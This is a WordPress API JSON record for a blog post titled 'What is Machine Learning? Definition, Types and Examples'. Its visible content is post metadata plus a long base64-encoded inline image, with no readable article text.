{"id":453,"date":"2023-05-30T12:27:35","date_gmt":"2023-05-30T15:27:35","guid":{"rendered":"https:\/\/labvetbio.com.br\/blog\/?p=453"},"modified":"2023-07-29T07:39:38","modified_gmt":"2023-07-29T10:39:38","slug":"what-is-machine-learning-definition-types-and","status":"publish","type":"post","link":"https:\/\/labvetbio.com.br\/blog\/what-is-machine-learning-definition-types-and\/","title":{"rendered":"What is Machine Learning? Definition, Types and Examples"},"content":{"rendered":"<p><img decoding=\"async\" class='wp-post-image' style='margin-left:auto;margin-right:auto' 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xTS9KW4lKSgoI2C0327dswgcZ5Tw59Ijcc8xziDLXsCxTjb2G3PWyxSXoz6o8JCW4jDiEFC3VFASEglRV\/eui1eaFAcqOBPAx4l+b5GU+I\/MuXck4cy7N7pNRKtS7G6mUqGpaSEuJccbWhskFKUFPdKEnZ3UpfR\/cY8w+FHnHkXw3ZTj2R3TB5fl3ey5UmzPt2t+QG0dWngFNIWttSUlPWT1M9PqBvoNXmh8qA0YvPHmfvfSyY\/wAjtYNkC8TZw1cVy+ptjxtyHvZZA8tUnp8oL2pI6SreyPnU\/eNGw33KPCxyVjuM2Wfd7rPsTrMSDAjLkSJDhUnSW20AqUfwAJqaa9oDXXwPYvk2I+DfBsYyvHbnZrxDtL7Ui33CI5HksrLrhCVtLAWkkEdiPjXNfw62DIuIcavVh5V+jQz\/AJJuUy9PTo10k4pNSpmOW20hkdUZWwFIWve\/6zXbKlAcxfGRYeRPEJ4QuIGMS8M+a4sqDlwiu4ezZZTsu029lp9hC1tJaC22ikJKVFIGlJ79xVi5W8D48IniI4+5q4b4av3JeANy203TH40N67Trc+kf79KEpKiNDrQojpStHSrXUnfVamhQFNa57V0tkS5sMyGm5bKH0NyWFsOoCkggLbWApChvulQBB2CN1VUpQClKUApSlAKUpQClKUApSlAKUpQClKxlvkPGVXjI7E9MVGlYtGamXDzkdKUsOIWtLiT\/AFJ02vZ+BFAZNSsBh82YLcMPx7NoMuS\/AyecxbrchDBLrj7qyhKSj4aIOz8AN1m\/tsTzjGEprzwN+X1jq1+XrQH3pVhxjM7LldqF4t7jrUcvvx0+0tllalMuqaWQlXcp6knR9D2q7mbDD4imU0HiNhsrHUR89etAfelY\/k2aWzFrjYbbPbdUvIZyoEdSQOlCw0twlZJ7DTZq9ImRHGfaW5LS2db8xKwU6\/P0oD7Ur4InQnGfaW5bKmtb8wLBTr8\/Sjc6G6x7U1KaWzrfmJWCnX5+lAfelYzbc+s91zO5YVEC1SrXBj3B14EFpTbylpT0kHuR5Z3V\/Zmw5KVLjymnUpOiULCgD+OqA+9KxeTyFY2M5tGBt9b8y8Q5c1p5opU0hMcoC0qO+ytuDQ18DVe\/kDkfJEWFdpleQqEuYq4bQI6ClYT5Z2rq6tHfprXxoC80qjfu9uYjyJBmNKTFbLroSsEpSBs7H5VQYvmFiy7G4WV2iWk2+ewmQ0twhJCFDY6hv3T+FAXulfNmQxJQHI7yHUKGwpCgoH+4r8GbDEgRDKZD57hvrHUf7etAfelfhTzSHEtKcSFq7pST3P5V+PbInQXPaW+hKugq6hoK3rX57+FAfalfD26H5\/svtbPna6vL6x1a+evWrVluXWrD8au+TT1l1izw3przTRBcUhpBWoJBI76FAXylW1F\/tyrVHuzjyWkSo6ZDaFqAUoFHVoDfc6qjwXL7fn2JW3MLUy81EujXnNIeAC0p6iO4BI32oC\/Ur5mQwCsF5ALQ2sdQ90fM\/KrdkGRW\/HrFPv8AKX5jECI9NUlsgqWhtBWrp+Z0KAutKtdgyG3ZDa4l0hPJ6ZkZuSloqHWhK0hQ6gCdHRqtbmw3XFstSmluN\/bSlYJT+Y+FAfelU4uEEoU6JjPQgBSldY0kH0JPw9DX0ZfYkth6O8h1Cu4Ug7B\/vQH0pSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAK138SfG+a3vJbPdsBiyFjK4q8PyJbCCosQHnEuCSoDsAgJdBJ\/wAYHxrYilAa34Hxhk1o5tXjDlidjYLiMmXfrG+Wz5C35jTaEsoJ7EtH2g\/MFz4dt4hZ+O86dzFmzXmwT4t+ayRU9WQRsdU4tTPtBcS4biZAQWy1pst9Gwn3QgkA1t\/SgIczXj1nJ+ecQn3LHnZVktdjnqU55SvZkyfOZLSFke7vsVBJ+KAddqii48e53Nz67Wq5WiaxdZuULnwMhjY2uQ4zEMjrZWJ\/npQ2hDekKaKdgAgJVvvt1SgIs5oxFeY3jj6E\/ZH7jbWMgL1xQhClIQz7M8NuFPogqKQd9jvR9dVEeXcZZvboWa2TCcZksY5EzK3XNFpRDUtibb\/Y0+0JZZ6kB5HnkLU2lQCigj17Ha+lAapQMdyu14FkVytmEyZFuvV2gNPWpzFFx240dAV50ti3l9S3FE+WCk9IJSVdJHrRWXC8wThV7bmYRfZmPM5pGuj9kFr9hduFs9nb8wNRQrXT5mlFoH3ukggEkVtim5W9c9y1omsKmNNpdcjhwFxCFEhKin1AJBAP4GqmgNRJWDZXe18nSOLeO71iUW72e1C2sTIpi+1pakKVJbbR1ANlbYWno2knq2enr3VRY8AzK7Y7mcvFbDcLKuTY2oKbc1j6rE3McD6FrCQt5ZU75SXGusAD+aPeOu22dKA1o4+sFvf53xjI8O4fv+I2SJj8+JMdm2sxGjIJZ6UlOyAoAEdZ+3rsT01eOdcVyW9ZXksm0Y\/cJrMjjO621pbEdS0uSluHoZSQO61D0T6mp\/pQGv8Aa+J4tkyfFU2PDTEi3LDZ0C+qSwQ288ptjy0SSexX1eZrq7\/arDbVic5jjHC7OeKL6mBilyb\/AIxsybb5S7uQytsPNp2BLQhzoWQN9Q1661W2VKAiPgmzSYNwyu72\/FZ+MYxc5bC7PaZrHs7jZQ2Q+8GN\/wAlLiinSe32SdDdRJmtmzu8clsXNjj+fDucDNYT5k2\/HD0KtyZCB7Qq4dZKwpv7aEjQGwQACa2zU+wh5EdTyA64CUIKh1KA9dD46r5xLjAnl8QZrEgxXSw+GnArynAAShWvRQBB0e\/cUBFvP1ryiJbbHyTgtnkXS\/4lP81EGM2Vuy4r6Cw+2lI+0QFpX\/8Ax7qLcK4lzzHcqsHGs23T5OMTJkTNLxcnEqUyJzbJ86KVHttcry3QPXQ+QraCHebTcJky3QblGkSrcpKJbLbgUthSk9SQsDuklJBG\/hVZQGprmE5CW3caPHV6PJa8jMxGZey\/7KGfausSPat6DYZ93yPX+nprILvxjMlxeeMhXis5+8XREyNZSphalPNLt6En2dP9RWv3SU+pQB8K2SpQGs+UYw5DymRLzji6+ZfFuONQYdhMOEZAt0hDRDzKhsezrUshfmHX5+7WZ8BXqVi2G4Hxbe8ZvEO7O2F6a6Xo\/SiKGnQkodJPUlRKxrt3qZa\/HlN+Z53QOvXT1a76+VAa\/c8YBmc\/M0JwqBMcgcj25vGMjfjoJEFpt4LEpevT+Q5Ib2e3dI9TWP41gWdOwcpsN7xu4ph4Ji10x3HFuNKJuSpBeKXWu3v6YRHb2P6iofHVbQPPsxm1PSHUNNpG1LWoAAfiTXwVdrYi4tWhdwjpnPtKfajlweYttJAUsJ9SkFQBP4igNeYvFVyxu84BIwPGn7POl4xcoV4mtMrT0yDDQWfaVf4g8Ngq77FY3xBgmWNZNjabhi9xsVzsTD31tKbxxUYS1eUULbemqkKTKDiyFhSUqJIB93uK21pQGokHiTIse4DwI2zDJBltSmpeVW562rlSJCUodSjzYxWhTwbUtJDe+wGwDrVS54csZulitF+uEtidAh3a4h+HbZFqNubjBLaUrU1HLrim0LI30qKTsE9IBFS\/SgFKUoBSlWzIMksOK2x69ZHeIlsgsJ6nJEp1LbaR+ajQFzpWr2bfSA8RWNbkbCbZesyeQSnzYLKWImx\/890gH80giosnfSS5Wl0qjcV2SM18Eyr4pS\/\/AKGiK1jgyS5SKPJFeJvpStGrB9JxavPSzmHFktlnfvP2i5tSekfPy3A2T\/Y1sNxh4r+CuWXmrfi2bx2rm79m23BJiSifkEL11\/5SaiWKceqJU0+hL9K8B33r2sywpSlAKUpQClKUApSlAKUpQCsd5BYyiThV6bwqb7LfRCdVbnOkKHtCU7QCFdtEjp7\/ADrIq89e1AaqxfFHf5F3HIj5Qzx+i2fVa2+gBRvghmUtAURv7RSwB8VFPxJq\/wB7zflSPccRwaZcry1cJeNm83CRaY8MyH5XXpTaRJUlCW2wQVBIKtFPcetTWvj7B3LSqxOYpa1W5UozjFMZPlGQVdRd6da6t9919smwjEM0jtRMsxu33ZphfW0mWwlzoV8xv0oDBLLn+dxOAZOfZHZ2HchgW2XKDbKkLblBsr8p3+WpSdLQELISojudVj9rzSXi2ESeQMm53ZvrUjHXLoYkWDGUW1+5\/PjISQtTaFLCSlW9lQ2pPpU2w7bb7fBatcGExHhsIDTTDTYS2hA7BISOwH4VYbXxjx1ZFT1WjCLJENzQpqZ5MJtPnoV9pCtDuk\/EelAQL\/2r8iWM51aXL9cnnIGCPZJBcurcIyI8kdYSoeyko8sgJISob7fEGs9wm9Z5aeR8fsGSZi5fYmTY09dnG3IjbIiyWlMDTXQAfLKXVdlFR2Ad1ndr4t45ssaTCtGE2aGxMYXFkNsxEJDrK\/tIVoe8D8QavSLFZ0TY1yRbY4lQmFRo73QOtppWupCT8AelPb8BQGt\/MGdZHg\/M99esEd6MzMsVpauV8DIdas0T2p5K5CkH7R98AD0HvKPZOjlF2uXI2Qcj5ViGO8kP2q3WHG7fcIzqIbL7j0lwPaUpShooV5e1AAE9tFPfcySsax+c\/MlTLPEfduEYQ5a3GgovsDem1b9U+8rt+Jr523EcZs6lrtdjhxlORWoSlNtgEx2wQ22f\/KkKIA+G6Ag+w8j5pyROxmzPZqjD25eGsZG9KYZZU5NkrWtC0o84FIbbCApQA3\/MHdI0atA8QeYWHFcfzjJXUPQL7bbvao6mGQlqRdozq\/ZH0fHpkNtL0neiSNdvWebrxrx\/fLXCst4w60zIFtATDjvRULRHA+CAR7o7DsPlVdcMSxi6wIdquNggSIdvdbfiMOMJLbDjYIQpCdaSUgkDXpugIL4y5P5MvuX2DiTJJ7ZySwyZ8zK5DTSelyE2lHsoA1oB0yG\/TR00fxrL+X8znw8hg4bj99v0K5\/Vsi7PItbMP\/w6CEhxbkshISlQVtKe5Hc6A3UlxsescO8Ssgi2qM1cpzaGpMtDYDryEfZSpXqQNnVUeSYLhuYORXcqxi2XZcJRXHVMjJdLROt9PUO29DY\/CgITxPOeR+THOPoMbM1WNN\/xOXdbi\/EiNOOOPtvMoSpvr6ko31knsRokD4EW+087ZfjOLYjyNnlyRIx92Td8fvjjTIQEyWHnkxZOh9nr9nKCN9PUsfhWwkDFcbtTkR222SHGXBjqiRlNNBJZZUoKU2nXoklIJHzArCM54XZzFm345FvTNoxFqUmZcrHHtrSkz3Evh8HzT7ze3BtWgd7PzoCKLY1m935S4hyTO8sl2y53ez3q4uR0IYQiK2Vx3RFHWjfdtSEL373udiDsn5XC5Z7h9h5W5FxjMfYmbDmjzqbX7G2tqXtMRLvnLV73dKgEhJTrp33322Pv+HYrlTUZnJcfgXRuG6Ho6ZbCXQ0sf1J6h2Nfp\/EcYkwJ9rfsUJyJdXjImsKaBRIdPTtax\/UfcT3P+EUBrzlOe5fbMnzprFZ0G1S3Mzxq1tyUwWlKLUmG11+aQAXT72gVHYAABAq65Jn\/ACBx+zndhlZiq5fU6rK7GvE2I2FwY810tvuOJbCUKS0EqWDoaHr2BNTa9hWJSH35T+OwFuyZLE15amQS4+ykJacJ+KkAAA\/DVfDJcQZu9vuyLQ+zarndo6Y7lwTEbfUQjfQFocBS4kbUOk\/BR9KAijj7ktxrl+\/YvM5bhZJjFpxpq5KnPORkpjvKf6VeY80EoOkn8NAgHuN1IPLmaR8Owly6IukqI7OkxoEORDZbec859xKEBIcIb7711KPSN7+FYzjHh3s8OLfUZpcY18dv8FFqeREtrdtiswkrK\/KbZa309S1FSlEkk61rVSZc8bsF5s68eu9niTLY42lpUR9oLaKBrQ6T27aGvloUBra9yxyZBsGfWdjIJSbjj16sMOFKuTMVySwmY8yl1DwjktL11q1rRAVo96yW9X7ljGZme43bsuev03HrTb8it7j8RpDqwXHS\/GIQkJKVJZISddQ6vUnvUtQONsAtcFy2W3DrTFiOqZW4y1FSlClNK6myQB3KVdwfn3plmKTrrDnSMTu7GPX+a00x9bewNylhtCiQhSFkBQ95Q7nt1E0BrtydnV05i4g5QzGw3t5vDIlpixbW0hpG5T4CXZK1kgkAdaG9A9ilfoRUgSLpPseYY5Bj3pF2UjC7xMFyfjsKkKcbXHKdOIQNJHVopToHQ2CRus+494xx3j7j6Fx1EZTNt8ZhTL\/tDaSJRXsuKWkDp94k9vTR1VwtWAYTY2WY1nxa2w2ozLsdpDMdKAht1QU4ka+CiAT89UBA1oyTmKS7xS3I5OUpXJcB323\/ALsZAgFuH7T1x+32yElBK+obUVdI7AfO5cr8mWiM1hDt3mzpX8ZSseXe4kWOmUthtnzWkJS4Ush5e+kE9tIVpJNbEN4rjjSrUpuyREmxpUi2kND\/AGQFHlkN\/wCHaPd7fDtVPPwbD7pAnWu5Y1bpUS5v+0zGXWEqQ+92\/mKB9Vdh39e1AYfxBluSSbZcIfIEvynGryu32qRPeioky0eWlQbcSyso85KvMSQnRISD0jvUm1YIOBYVbIUC22\/FrZHi2uQJUJluMlKGHtEeYgAdlaJ7+tX70oD2vCdDde1iXKfI9g4nwO859kr3RBs8ZT6kgjqcV6JQn8VKIA\/OlXwg3XLME8TPidwrw34mLre1JnXqeFJtVqacAckuegJ\/woCiATr8Bs1yZ5i8XUzk+9LvXKmXouz7ThVEscZRVAgD\/D0J91a\/mTv5HdQT4lfENmPPPJV0zG+z3NvvKDLSVHoZaBPQ2j5JSCR+OyfjUU2yyXm+SPZrRbJU57RV5cdlTitepOkgmumMlhdRVszcd654JqyXxEzLn\/ItXmK32SPsgD4D8KvvBeKZdz5kF2sbmVNWQ21ht\/zVMF8K6yQBoLTr0raD6Pz6NGzZ5YYPNXiBgPuWqXt2zY+VFsSmwdCQ+R73lnW0oGuoaUTogHoBI5V8JnALhw2Pd8Uxt2IA27BtcErWyQPsuiOhRSrXwXo1f4icnVFHCKRyWzLwXc9Wdtc7D83t9+Qkf7pKlRnlfPSV7Tv\/ADVEYsXP2OGXHu+Hz5X1SvzZMdxvb7Gu4cCUnrT8wtI9Pjqu9Nmu\/BfOVuecxa82G+kJ\/mLgupElk\/AqSNLQf+YVrH4kPDpbH9Wi9rdDToWq03mMry5URY79lD0IJG0\/ZUPhVo5FklTtMo3KHPDRAHg\/+kryTF5EfFeWblKv2LtlDLkyU55lxtHfpClL9X2N6HUR1J2Afhvq1YL\/AGfKLNDyGwXFidbrgymRGksLC0OtqGwoEV\/OHzTaM14s5Uet+Sx4Sp8ZIPtcdrpaukdXo4seh6hsK9O+\/wA63o+i\/wDF99SZmjgDJLm65YL6rzceVJc2qG+Sdx+o+oJ7fno\/E1zTipN11OhPg6yUrwele1kWFKUoBSlKAUpSgFKUoBXlWzKHb2xjd0extlt27NxHVQm3PsqfCT0A\/h1aqBeNOVHrK8qTybyTlMe7RbM\/cbpYb7Y2YqStlsLeXEcQ2PMQjStAKVsa3o7oDY6lRNivM+S3G8WFjL+Ol2C05bsWOaLmiS44ryy6hEhoIT5KlNpJGlLG+xNfjk7N+RrByngWO4ha4k6BefbvbGH5ojh8ttdWiryllPQPfGj7x9069aAlsEH0Ne1rnbeZ88xO4Z1c7hi0i+Y3Zcsfiy5zlzS2uDGJbSlLDJQS4EdXUR1J9e26ufIHintmFZLeLQxaLZMhY0tKLqt+\/MRZqldAWpMWKoEvlKVD1UjZ2kd6AnmlR\/yRy3DwbCbXlFss8m+zMhlRIFkt7K0tKmSZX+5SpauzadHalEHQB7E9qwGV4kcxx5GYQs24pTabrh+PR784w3ekyGZgdfcbCW3Q0PdAb7qKd9XUOnQClYZNTjxy2yf2f54HqaXsXW63Es2CKabpd6Kb5S4TabVySbSrkn6vFHQ3UbXrmEWXkCPg79mb8t7EZeVKmrmoaSgMPNN+SQsBIB83fmKWANdxruIan+K645thfJePRrfbrNfLRhNxyC2XCxZAi5tpDba0jqcQ2jy3kKKFADqBB2Fdu9MmrxY+r5OjR+zvaGtSljh3e67tcKT2p1d1fWlwbWdfz1X6B2N1qlm\/Kmc49ZslmYu9cJV9t3Ftqvgek3UCK0txbwcfSwppQLyQgrJJPmdknp1upIsHOV4s8\/HLFyzjkPHnr3j0q7tTGbp7Uyt2MepxnflN+8WNPdvT30693ZiOsxuW18fx1r+S+f2c1mLGssald8JrdxFSb23bVP8AtImavCdVGmOczNSuFDzZmNhesNv+r3bv7GHfaHvYwSWlfZR77iOlQT8OsDZ9aseN8353Jvlqs2ecTHGhlMd5zHXReUSw+820XfIkhLaSwsoG+3WOyhvt30eoxquevo\/Hp8jjj2PrJe8qK7jafej1jzJLnvUuXtulz0JmC+9OrVa\/+FO48k5Nj16zzPlzVPXabJTFQ5fjLjny5LyCltjykCMEdCUDpKusDqIB7VgTXMnNVy4W5JyK\/wAYQ37Flq4FtmW+4JXI0i5ttrhhAabHShB6A4VEr6jsJrH42KgptPlN\/RHor2Z1EtVk0sMkW8coQbtdZuuPNJ9fH08tvgd17UHQPEZNsMrLbfy1gjmLScXsackSmLcUXAS7eVKRsEJR0uhaQno7jah73xqk4i8UsfkfNImF3SyWWBIu0N2dbV2rJGLqehvpK25KW0pLDnSoED3knShv3a0+Mw2o3y\/n8vocsvZ3tKOOeb3dxgrbTi1VbrTTe6ly6uvEnylRFmnNGVW7N7jhPHnHX8UvY9CZn315y6IhJiodClNtNBSFea6pKSrpPSnWve2e1Nxh4hHeRrph1tViRtv8WY1NyEqVO80xfIlNseSR5aevfmdXVsa1rR9at8Ti3bL5+vy\/ky\/RNd7j4jYttX+6NpOLkm1dq4ptWuV06omala637xdwrTj9skIx+2MXq9Xe7W2HGud9bhQ0tQH\/ACnX3ZS29I3tGkBCiSrQ9Capp3jGiDj+1ZdacYt7kqdeZFime13xDVrhSWUBaiqehtaVIWFI8tXQOrq79OjWb12BX3vXx\/PE6o+y\/a0kpLDw24rmPVX69O61fS1VmydfkKBPaoFb5U5cuPOOLY7bMZtLuP3jFE3WY0m+IUlkqkNJcfbcSwfOLYX0pSFJS4Fb2nVWnF+d7nbY0rG8Zxu65Pld5zPIrdbYFxvQ8sNQnyHnVSFN\/wAlhIKelsIUR1BIJ7kT8Zjvn+H6dPPqR\/xzWuKcabaT4lHhPde53UaUW3fFc2bJUqB5PiVvca1RIyuMX1ZYcmRi0+xpujemJS2C8242\/wBHS40pPQeohOgVEjadGiuHinvFgwvK7pk3Ga4WS4heIlouFsbuYehtCSlKmpS5Ya9xgIVtSi1tOtaO90eswrq\/s\/y\/TqVj7N9pTpRxpttJd6PNtJP937W2lu\/byueTYWlYNgOe3rNuN280RZrSZ77L7jES3XlE2K8pBUEBMpCANKKR\/RtO9EbBFR9E8WGPTbJh90Zsbnn32BcLpe4xke9Y4sBCvbFL0jbikvANJTpHXvex6HSWoxRScnV\/n+zmxdj63POePFC3BtOmuGlJ+flF151S5J6pUJYjz7ltzu+N\/wAZcWu47YM2PTj1x+tm5Lq1lovNoksJQPIUttJI0pYB90n419\/\/AMQjv\/Z\/iWc\/woP\/AM05YzjHsvt3\/hvMmuRvP6\/L9\/Xl9XRoeuurts1WqxNXf2fp\/aNJ9g6+ElBwTtpcSi1b3cWm1fdlfk1yTKa5t\/S88yzIFjsXDtplFtEtCrrcQg\/b9UMoOvh9tWvmU\/KukivSuLX0iN1Xlninv8V1ZWzbDHhIBPYBDadj\/qJr0dHDfl5PCzy2xNcuAPDZeOcM3mRHX12\/H7Q\/5dxmhOypQOvKb32KzonZ7JHc\/AHqLxdxPg+Cw4GI4XjEK2QlKbZcU22PMeBIBLiz7yyfiSf\/AE7Vg3h7w604pxxam7OhIalpXOcc13cedV1rUfme4T\/lAqcrS57Klie2AVtKCv7g172n0ccMLq5M8fNqZZslLobQhi22SxhhK2YMGBG6AoaQhhpCdfkAkD+2q4wcU8i4lxP4i8vhKwpXiExtDklz2+0RX31NuPO9XnOpdbIWsAKSSNpOyUqNdf8AIbZC5X4vulhjXAsM5Da3oSnm+6mS42Unt8wT6fhXM7h3jnxz+AnIsrtmAcEwOQLHkLzby32FFzqU11hCkLQpK0ghZ91Sa+djKUE\/M9mlOi6+DCWzyv4wZmecYxI2G47a3ZD8ywuTEpkIaW0pHkeQdLUOshR93pTr12ADvp4ozarfwnkOSXNxLKbAyLkl8\/8ADCFDrP5dBWP71or4QvDp4oMx8ZknxU8u4J\/AMBbsuXKh7DXtLjsdTSGUNAlRSOoKUpXr0\/M1Nv0rHOVp418NdzwNuUg33PFItcVkK95EYLSuQ6R\/h6E+X+bg+VJZHkkpPwIWNQjtXiczPFfy3xjyfboCLHLXNvdveIalMtkI8lX221k62NhJGt6IPzqBcKvtxxy9xshtch1mXaXETGVtq0pJSsb0fh61jw7k1fLSqKxDnoU2VPKjHy3ArtpRA6SPnsg\/2o575bjSMdsdp\/SZwNyI3yvxBinIKFpWu82xl94p9A8B0uf\/AFA1n9aPfRpcu4rY\/CjZrVnmVW6yybbPkx2WrhJSy4pk9K0qCVkEp2tXf07Vtdb+Z+Jbq6li38kY484o6ShNxa2T+AKqpJUyUZnSvkzJjyG0vMPIcbWNpWhQII\/AivrVLJFKUqQKUpQClKUBS3W3M3e2yrXIdfaaltKZWth0tOJCholK090n5EdxUcQ\/D\/jy7mzccqyzJ8sREiSYMSNe5bTrTDMhHQ8B0NoUsqQOnayo6\/HvUo0oCOcZ4RsuO3S03B\/KcjvDGPpUmzQrlKbcYgbQW9o6W0qWQglIK1KIB\/vV5zjjmBm06y3c3u7We5WF512HMtrjaXEhxHQ4ghxC0lKknXpsdtEVlhOhusByfnTjXDsjRi2R3mTEmqdZZW59WyVxWVukBpLshLZZbKupOgpY9R8xVZzjjVydG+n02bVy2YIOT60k26+h6\/wxjEnGspxd643YxsuuC7lOc81vzUOrKCQ2fL0E\/wAsfaCj3PeqW8cIWG55JOyOFkV9tKrq6h+4RoTjAakuJSE9Z8xpS0EpSkEoUnYA+Peq9fNHH4zdfHbVzlv3tt1Md1DFukusMvKQFpbckJbLKFlJB6VLB7j5isX4i8QFmzi0Y\/GyF+NGybIHJ5YtsFl17pZjvrb8xegrykaSPeWUpKjoHfas\/iMe5Rv8Vf2dP6VrfdPN7t7VT6Po1Jpr0qLd9DNeReNcf5LxtrHLy5MipiymZ0GXBdDMiFKZV1NPNK0QFJPpsEfAgiovt\/h1lO5zmTeWX695DYcrxOJZpFxuE1szFvJffK0pDaEpbSlC2ynpSBsk9zsmUsz5Nw7AXIjGTXF5qRPKvZo8aI9KfcCddag2yhSulII2rWhv1rDcM8QON3TDJWZZTOjRYy77NtNuTDZeecmJaWQ30NJCnFrKR1EJT27nQFRk0+PJLdJc\/n9l9J2vrNFieHDOov7cp2n1XMV6cdCgHhYxWdLmTsrzbMMkfnY5IxZ1VxmMdoTrjbh6Q2yjpWktJ0r47Owfh6nwuY3J+tXb\/nmYXmRdsXk4i49LkRQWoD3r5aUMJSladdlaI7nYPbVwyvxGYZZbPj1+sy5N0iXm9C0veXBk+bF0CXOtoNFaXE6TptSQpWyQDo1kOSc1cdYlIZiXy8yGn3oyJqmmbfJfWxHV9l15Lbaiyn17udPofkdR8Jh\/xNf1\/tLwyv7Kvlxx9K8PItsrgPDJq7qZsm6Pt3jEmMNktKeQE+wteZ0rSQgEOnzVbVvXYaSKjLmLgDJs1seJcUsM3i\/26BdGZ72VXO6R234UcAtvRvLabQVhbJKAAB9rZPapimcy8cwr\/BxdzIkuXO5RWJ0VliO68HY7qlBDoWhJT07QrZ3oADetjdmY8SnDMhcdLWXK1LZU9GcVb5SUSOkbLbai3pbo\/wDhp2v4a3UZNJinFxqr\/Pz7E6Tt\/XaTLHNGduPKvwdbU1VeHh0fimjNbziNgyDFZeFXa2tvWabDVAei\/ZSWCnp6Rr07emvSsIxTga041fbZfrhmmV5I5YWHI9mZvEtlxqAlaQhRQENIKl9A6etZUdb+Z3VP8xY5ecdi5BiF9iBpV8iWaT9YQpSFtuuOpQpktdKXEOEKHSVAJBIJ7V9HOfeK2LyLA9kq0yxcFWpxRgyAy1LC+jynHvL8tBKuw6lAH4bFayxQk1JrlHDi1+pwY5Ysc2oy6\/VU\/la4ddVw+DIMBwe18d4vHxOzSJb8SO9JfSuUtKnCp59bytlKUjQU4oDt6a9fWsFd8N2LuR8ntaMoyRqz5TcvreRbESGDHjyzJbkLdZ6mitJWtsbClKAClAAbGsjvfNvGmPX5zG7rkJblsOIZkrREfdjxXF66EPPoQWmlHY7LUPUb1sVVK5Ywj+Ljg7dxkv3ZLiGXEsQJDrLTq0haULfSgtIUUkHSlDsR8xUPBjaUWuFwXx9pavFknlhN7pO2\/Np2n80+bKHI+FsPyzJrvk1\/EuWb5jhxiZDU4kR1RC6XCoAJ6wvZ9erQ7aG+9U\/HnC8Djyf7axl+QXlLUf2WMzclRihhvY9C0yhSlaAHUtSjr8yTlk3MMft2UW\/Dps4tXa6x3pUJlTS+l5DXT5nSvXR1J6knp3vR3rVWC4c18cW21pvD99ccjuzn7awliE+87IkMqKXUtNoQVuBJBBUkFP409xj3b65D7S1bwvA5twaSr0Xl5fTr4lqzjhC35RkM3MLRlWRY7dLjAEC4C0SWmkXFpAV5aXQtteiOopC0FKuk636awvjzw1yI2AYA3fMhvmMZXiNvkW4yrJMaKlx3nSpbKy42tKknSFbABBHrUp2vlrALyixrtl\/RI\/iOS9Dt4Sy71LfabU440sFO2lJShRIc6T21618b1zHxzjrM+ResiEVu2XNuzy1rjPENS3Gw4hvsjvtJB6htPw3vtVHpcUpbmvy0\/wDR0Yu3NdiwLBGfCrwV0lKNeqqTVO+KS4MNT4WsHi49aLNa77kMOXYZs6bb7qH2XZjRlr6321FxpSHEKPT2Ugn3Une+9Xm58Gx5+JQ8Tj8g5XCRG8\/z5LLkUuTg79sPoWwWljXYaQND0rLZ2e4tbMNTn1yuKolkVHblee+w4hYbXrp20U+Z1HYHR09WzrW+1UFp5Xwq8t2tcadMaVeJ7lshtSrdJjuLkoaLqkFDjaSn3AT1KASfQHfapWmxJNJehWfbWvySUp5G2m2rSfLtvqvNt10tt1ZjcLw+43ZHcSfxfIsgsjmIW36njriSGiZcLrQtTL\/mNqBBU2k7T0kdwCKpXPDViCGEu2u\/5Da7sxfrnkMO7xJLKZcR+esqktI20UFlWwOhaVdgNkkbrL7lyzgFoZvr9yyBuOjG5TcK5FbLgLUhxCVobSOnbqlJWnQb6tk69e1UjHNnHD2MScvcvj0a2xJAiOmVAkMPB86KWwwtsOqUQRoJSSfhT4bF\/j+fiQXbWvTv3r+3PXr5rvPh8ctdGWm1eH\/FLYm2uuXi+Tp8DIU5O\/cJUhtcifODRaBeIbCegIIASgJ0EjWu+\/tP4Ptci65TfbTmOT2W45ZNiTpb8CSyktLjseSlCAtpQKFJ+0lYXs9xrtVcOb+OP4cTk6rxKREXKMFDS7bJTKXIA2Wkxy35qla79kka7+nevXObuNm8ejZKm\/OOxZcpUFlpmDIclKkpBKmfZ0oLwWlIJIKAQO57d6n4fHVV+dCn6trXJzeRtvjw6WpVXSrSddOPI9454xtHD2GSsdxNMy4qXJk3NxUt1tLsqU6SpRJQlLaNnQASkJA+FRvwxwSI2R8j55nGFt2hzPHVxk2ZyYiUI0JxO5KepHujz3lLcUB8k1JV45nwCxwrXOuFxm6vLCpUNlm1ynn1sp11OKZQ2XG0jqGytI1sD1OqzSO+3KjtyWSSh1IWnYIOiNjse4\/vUPTY3t44j0ReHbOrhHP3u9mrdLm3TUvOuqXhfgmk3cWYp4ebDjF2ss9\/MMpvcPGARYrZc5jTka3bbLYKOltK1lLZKElxSiAfn3q2Dws4qJVvH8b5h9U2fIW8mt1n9sY9jiy0vl8pSCz1lsrUrYUokBR0RU1UqPhcNVtLLtztFSc1ldv5evpw+Xz15fPLPyquJ\/jriP2jxRZg5IR0+dN9oT\/5kLSkg\/6Gu2JGxquWH0sfGkqzZzZeTocRXsd5ieyvuJT2D7PwJ+ZQU6\/I\/KvT0UtuWjw88d0aLD4XuZIi7czgN7lJQpCiq3OqVoKB7lo\/jvZH5kfKtnGLoWU7SrafQiuR1kzF23yUkPFC2lBQUDogj0NbQ8VeLdyFGatOb9c2MkhKZiD\/ADW0+nvD+vX+v519JjzKXU8PLglB8G++Fcp3XDJWmNSYDytvRlq0PzSf6T\/6VTn6T3wgQrrOsl9z+TbpVueVHdUq3PvtLWk6PQ4ylYUN\/H41oh4rfFNBsWFJxrjy6tSLhkTKkqmx3d+zRj2UR8lq7p12I7+hrn0pRWraiTs\/E14nabxb6iu94s9TQrJsuT4O1XLv0wnh7xS1SE8WW275ndyhQjhTCoUQL12K1uDrI38AnZ\/CuTXOnPPI3iJzuTn3JF4M2c8PLjsIBTHhsgkpZZRs9KRv8ye5JNRyoEKII7g1KXH+I2+xWU8iZXG620gqtsVwdnVD\/iqHxSD6D4kb9B386EHN0jtk0hgHCs\/IVxpmROOQosgdbMZIAkvo\/wAQCuzaPj1q+HcA1P8AjmJ8b4G15nRDadSB7kchTn+Z5W1E\/wDL01q3fs\/yW\/TZMhE6Q228feCFaJT8AdfD8KsSrleWST7XKR1H0Liq1jOEHwr9StOXU3GufK2CQ1K3AhLCe5U\/pw\/mSvdW2dyRjojiZ\/DbAjuJC0OMxkp6knvsFIGx+Nat21653VYskNhqS9MKGkq0SsqUodhv477V2S4gxqDi3GVgxCXBYuIg22PFfbdSlaFKSgBWwdjW91vDJu5S4KSW00jwHxVX3C56Tx7yLdrC4hf\/AIdUhTsVZB9FNLPSf7aNbw8B\/ST2y6yIeNc3QY8F2SoNR7\/ABMR4\/JaQPdV8SB3136dd6xnkXwhcKclETzg9ttNxT1EOwFrjtu7GtOIR0g\/PYAP5jtWgvM\/Fsjw\